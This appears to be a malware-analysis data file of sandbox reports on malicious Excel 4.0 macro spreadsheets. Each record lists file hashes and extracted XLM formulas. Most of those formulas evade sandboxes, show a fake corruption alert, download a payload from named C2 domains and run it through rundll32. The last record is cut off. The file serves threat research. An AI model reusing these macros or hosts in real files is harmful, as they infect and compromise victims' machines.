{"version":"0.2","sample":{"sample":"","kind":"file","target":"66ced5293373fcdcdc9225851d8fd2414e9479b7eb01308f5405f32b85db1094"},"analysis":{"reported":"2020-04-09T16:16:45Z","score":10},"files":[{"filename":"66ced5293373fcdcdc9225851d8fd2414e9479b7eb01308f5405f32b85db1094","filesize":116224,"md5":"17eff3f3abf36e6c2719d85e5c3b809a","sha1":"966b42e03e656d05fc2b2778ec76b4d5b7d7fec7","sha256":"66ced5293373fcdcdc9225851d8fd2414e9479b7eb01308f5405f32b85db1094","sha512":"cc4b86ae16b09fad14b8a8e7b8e5cac3d38f5382feb575bbc3b571f86631a1b187c7d82369713f69471849f4e7253a7089474c98b6c08df36017f672af5d1b5b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"66ced5293373fcdcdc9225851d8fd2414e9479b7eb01308f5405f32b85db1094.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"MNchkDZ9tU\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"66df44df5b7ec5b5b0c05c7c6368d024ad05e1f25db911d71c6b77f5f52236c2"},"analysis":{"reported":"2020-04-09T16:16:45Z","score":10},"files":[{"filename":"66df44df5b7ec5b5b0c05c7c6368d024ad05e1f25db911d71c6b77f5f52236c2","filesize":116224,"md5":"82dac4937d78100f69677020b6b0baac","sha1":"e426b018df3333f87187ddbc456fbefaec7f1b99","sha256":"66df44df5b7ec5b5b0c05c7c6368d024ad05e1f25db911d71c6b77f5f52236c2","sha512":"cb0fb886c79cefe5b5157c0ea57b1c95d2258144c3d9efb6a3db0a0fc74331e34b47129d6abf6de7ede67b8e06f195551477950c398526556cf5fc2c5118df03","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"66df44df5b7ec5b5b0c05c7c6368d024ad05e1f25db911d71c6b77f5f52236c2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"GsLEl0YYHs\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"66df9675704e7c9aacd323127324a24a68ccec72d4fd047fcef36ea5509ba119"},"analysis":{"reported":"2020-04-09T16:16:45Z","score":10},"files":[{"filename":"66df9675704e7c9aacd323127324a24a68ccec72d4fd047fcef36ea5509ba119","filesize":206336,"md5":"80026c57a4ef3e4ec3c4b8eba06b2f32","sha1":"bb588d377be694216782d0f01ff7c86124dac9dc","sha256":"66df9675704e7c9aacd323127324a24a68ccec72d4fd047fcef36ea5509ba119","sha512":"5c62f2458a7e38fa51e5f4fd3f4373501f88351660fef286193845db7b5474eb99b428f064157350032ce1b1fbcebb590b89f8491dc69bf98a89180f28fad107","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"66df9675704e7c9aacd323127324a24a68ccec72d4fd047fcef36ea5509ba119.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"FAGDQAiImo\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"66efcf639783425f6363a7a5ab1c894333981ddb22aedb83c87d1eff9890cd39"},"analysis":{"reported":"2020-04-09T16:16:46Z","score":10},"files":[{"filename":"66efcf639783425f6363a7a5ab1c894333981ddb22aedb83c87d1eff9890cd39","filesize":171008,"md5":"f0d4ea06a7efb93f631d0fd0d8a2ca7d","sha1":"b181de5c409d12e8ffe18beec82c5123aad3e71d","sha256":"66efcf639783425f6363a7a5ab1c894333981ddb22aedb83c87d1eff9890cd39","sha512":"cc9ae45f07acffd99bd39f814b20ae8dbfdfbd8e9ce9dac148563e7822a855e63ba37865d57283b4fc840378bf9cedb1fac88f9e5c0acd87020220c96c66192d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"66efcf639783425f6363a7a5ab1c894333981ddb22aedb83c87d1eff9890cd39.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"0kZbBnGspl\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"66f5a2a5013a55cf2481d040daec5c801aafeff3ad9c7a5b2dcd66a302fae42e"},"analysis":{"reported":"2020-04-09T16:16:46Z","score":10},"files":[{"filename":"66f5a2a5013a55cf2481d040daec5c801aafeff3ad9c7a5b2dcd66a302fae42e","filesize":185344,"md5":"84626bc972e0dd3797e84caf394a2d24","sha1":"6ad197ed557769a5916cde4a6e28960ae4f09c6d","sha256":"66f5a2a5013a55cf2481d040daec5c801aafeff3ad9c7a5b2dcd66a302fae42e","sha512":"696961e1631b438da5dd158667ef7a4048c654b909dacfa026018b811f17e8ebccce475b613f9343b0df4a65dd28e99dc1c9ee048f0b2cd44029a31dda9f033b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"66f5a2a5013a55cf2481d040daec5c801aafeff3ad9c7a5b2dcd66a302fae42e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"66fd008ac81c93ed23a27e723171e4442c2e9acbb28da845c1efb421610e4f89"},"analysis":{"reported":"2020-04-09T16:16:46Z","score":10},"files":[{"filename":"66fd008ac81c93ed23a27e723171e4442c2e9acbb28da845c1efb421610e4f89","filesize":206336,"md5":"34b4c4aa0f77e70c2c09e02b16620d23","sha1":"5f3de8aa2a06c92e3741fee39f8e40343360c190","sha256":"66fd008ac81c93ed23a27e723171e4442c2e9acbb28da845c1efb421610e4f89","sha512":"640a986f57690da2be0b6c01c3e829a9ffc788513f9e78d141e0eef05e47d83e8fd1fc6d8a2fdf936a669823a098eeb1558acb31b02b946d893311ea5de56bb1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"66fd008ac81c93ed23a27e723171e4442c2e9acbb28da845c1efb421610e4f89.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dS0LgAPMZX\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6713e59a3f0ba89780b5b03cc9744cee8f2d82cc40e794c74ae879f7824d5af6"},"analysis":{"reported":"2020-04-09T16:16:46Z","score":10},"files":[{"filename":"6713e59a3f0ba89780b5b03cc9744cee8f2d82cc40e794c74ae879f7824d5af6","filesize":141312,"md5":"6a6a383cc64d353f4cf54d5f7bc9ae07","sha1":"8ba2e737ea07d059ed395f14c1ed9c34112cd3c0","sha256":"6713e59a3f0ba89780b5b03cc9744cee8f2d82cc40e794c74ae879f7824d5af6","sha512":"682f74fabb7fe8e04c23bb8c8de4b1124f6bd08a4977ca7923dc24d1236786a2f03dfe9fb3bb907bc47b69815f743767e585ae0035fc6be9fe313ca46e162c21","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6713e59a3f0ba89780b5b03cc9744cee8f2d82cc40e794c74ae879f7824d5af6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"YYTb0Z48h5\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6717ca965716eded20b0494602a6ce8ffe7eb9318481cc89a23a3b277bec017a"},"analysis":{"reported":"2020-04-09T16:16:46Z","score":10},"files":[{"filename":"6717ca965716eded20b0494602a6ce8ffe7eb9318481cc89a23a3b277bec017a","filesize":113664,"md5":"29a3ba061080b0022477351ad8f3fadb","sha1":"e4839c6a73f4cd01761edc36c583ef85cdc6e48d","sha256":"6717ca965716eded20b0494602a6ce8ffe7eb9318481cc89a23a3b277bec017a","sha512":"3f62807930fddc052455bcc560d785f7d14f05019ca8f446bb03b4ff30476a52f38312f64e4c9b7c358cf36767874d3dd63a1d05863ba42a7bd8014012f79395","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6717ca965716eded20b0494602a6ce8ffe7eb9318481cc89a23a3b277bec017a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ewFfibgtPl\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"67187a9675d1275c7f55532f1fb6436527c4810d54de3828e9dc59a5b34f2a8a"},"analysis":{"reported":"2020-04-09T16:16:46Z","score":10},"files":[{"filename":"67187a9675d1275c7f55532f1fb6436527c4810d54de3828e9dc59a5b34f2a8a","filesize":185344,"md5":"d4b5f62ac36c2d60c3b3ccc23c40a449","sha1":"078b5598954186c8bf6997aee8c9c07bea5ee5f3","sha256":"67187a9675d1275c7f55532f1fb6436527c4810d54de3828e9dc59a5b34f2a8a","sha512":"112423558851887fae7da2b564c46a355101c26eef332d0d1bd2a43da6ef82d59f1f32e864cd9eb284895f88aa8909845d0839f976ef1666658a3e659803e6ca","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"67187a9675d1275c7f55532f1fb6436527c4810d54de3828e9dc59a5b34f2a8a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"671d117493e5e588e8e1dfd59e813242f5ce8d86d37ef14a179084f584ade035"},"analysis":{"reported":"2020-04-09T16:16:46Z","score":10},"files":[{"filename":"671d117493e5e588e8e1dfd59e813242f5ce8d86d37ef14a179084f584ade035","filesize":225280,"md5":"537883987fc9b0772eebeb197f4f52eb","sha1":"5d9ad6d1e137c734f2b1d0de5371da8cdfd2ced9","sha256":"671d117493e5e588e8e1dfd59e813242f5ce8d86d37ef14a179084f584ade035","sha512":"d5dea4619eed3641c1e4e965f5217884d3e4b050d76d06ed81ddbf1176beee4938db8e5fa6d11ad91031e6e939841de832a367a2cb9b0d4df119ba427cdc4feb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"671d117493e5e588e8e1dfd59e813242f5ce8d86d37ef14a179084f584ade035.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ARBxiFQnPw\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6731bb3ecfd3a04c6b6b656b91d658146cbe09479dbca19521d51af48a218141"},"analysis":{"reported":"2020-04-09T16:16:46Z","score":10},"files":[{"filename":"6731bb3ecfd3a04c6b6b656b91d658146cbe09479dbca19521d51af48a218141","filesize":168960,"md5":"0e9b905739dd4a1bdf7952a4d9372873","sha1":"d29e48095da18fe9a90ed0cca5fc1dfdb766a916","sha256":"6731bb3ecfd3a04c6b6b656b91d658146cbe09479dbca19521d51af48a218141","sha512":"17b83c75e0966630256f630c7f0611e659f29e8a5d95dd9c5110c09f35f12b943af64083bca4c366ee12ee515a04fc76f845972fb3d0a0dfac03e4de575d60d5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6731bb3ecfd3a04c6b6b656b91d658146cbe09479dbca19521d51af48a218141.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"JfYxTbVvze\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"673f001bb28cff392e2fe5da01afff14c9e4b95273c484599104ebca4449ff04"},"analysis":{"reported":"2020-04-09T16:16:46Z","score":10},"files":[{"filename":"673f001bb28cff392e2fe5da01afff14c9e4b95273c484599104ebca4449ff04","filesize":225280,"md5":"18b352449c077de3e86eadf78e90330b","sha1":"4943f44c41f7cf31b460b2e350df2b9de48f2c63","sha256":"673f001bb28cff392e2fe5da01afff14c9e4b95273c484599104ebca4449ff04","sha512":"bf2a990ba58508bf57a04e40ea23f98e878d333e02dda3d6b16a698aaebd1b9b5a12dfface197d2a3e544ef09ee5890a88883efd04fab3182866914245b7a3a2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"673f001bb28cff392e2fe5da01afff14c9e4b95273c484599104ebca4449ff04.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Zk6FLVtBzY\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"674da7ef5c3e2f9a6387cab812dc8466c055ad005ab1419338eaf57cd1d711a8"},"analysis":{"reported":"2020-04-09T16:16:46Z","score":10},"files":[{"filename":"674da7ef5c3e2f9a6387cab812dc8466c055ad005ab1419338eaf57cd1d711a8","filesize":209920,"md5":"58543a4145c2e236a387c1aa41c22e8e","sha1":"d7427e117fbbe8377505de568e05198afc116348","sha256":"674da7ef5c3e2f9a6387cab812dc8466c055ad005ab1419338eaf57cd1d711a8","sha512":"8b8af7923e0b28226b958844eac014c4a61cabc0d552dc5c67d7df4e5ff4716fd081227a1fb9b6c0749f1f4bfb9f942c7a2e006914bad95b82ff7339f82a002e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"674da7ef5c3e2f9a6387cab812dc8466c055ad005ab1419338eaf57cd1d711a8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Sh1SY7m9lN\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"675072499a7ea10b6cf37f86341736b3726ea473a4dba98de68d9cc76e78bd2a"},"analysis":{"reported":"2020-04-09T16:16:46Z","score":10},"files":[{"filename":"675072499a7ea10b6cf37f86341736b3726ea473a4dba98de68d9cc76e78bd2a","filesize":167936,"md5":"ca373234a0b13ff9db291b71716a0063","sha1":"669b34b93971406df51b8b235fdb870e9ae4812e","sha256":"675072499a7ea10b6cf37f86341736b3726ea473a4dba98de68d9cc76e78bd2a","sha512":"15d96d9b5ae4081bf1bc456a637ad5da98b0dae64501e85202ac18bffef94b36e8c7166330b335f28fcf6211bde62b5c661b8f3f91f88ec84b2c846216a01537","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"675072499a7ea10b6cf37f86341736b3726ea473a4dba98de68d9cc76e78bd2a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), 